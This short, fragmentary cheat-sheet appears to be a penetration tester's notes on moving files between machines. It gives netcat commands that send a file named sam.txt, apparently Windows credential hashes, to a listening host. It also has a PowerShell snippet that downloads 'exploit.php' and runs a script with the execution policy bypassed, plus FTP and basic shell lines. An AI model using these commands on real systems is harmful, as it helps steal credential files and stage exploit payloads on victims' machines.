- moving files using nc.exe
from the receiving machine run this cmd
> nc -n -l -p 2222 > /tmp/sam.txt
from the sending machine run this cmd
> nc -v -n -w3 ip_of_the_receiving_pc 2222 < sam.txt
- File transfer script using ftp. Remove the space after each cmd and before >> sign
- Powersheel scrip to download a file$storage = $pwd$webclient = New-Object System.Net.Webclient$url = ""$file = "exploit.php"$webclient.DownloadFile($url,$file)C:\powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File get.ps1
- Powershell FTP upload and download from
- https://www.thomasmaurer.ch/2010/11/powershell-ftp-upload-and-download/
Creating a file
echo 'Some Text' > /remotefile.txt
command | grep 'string_I_m_looking_for'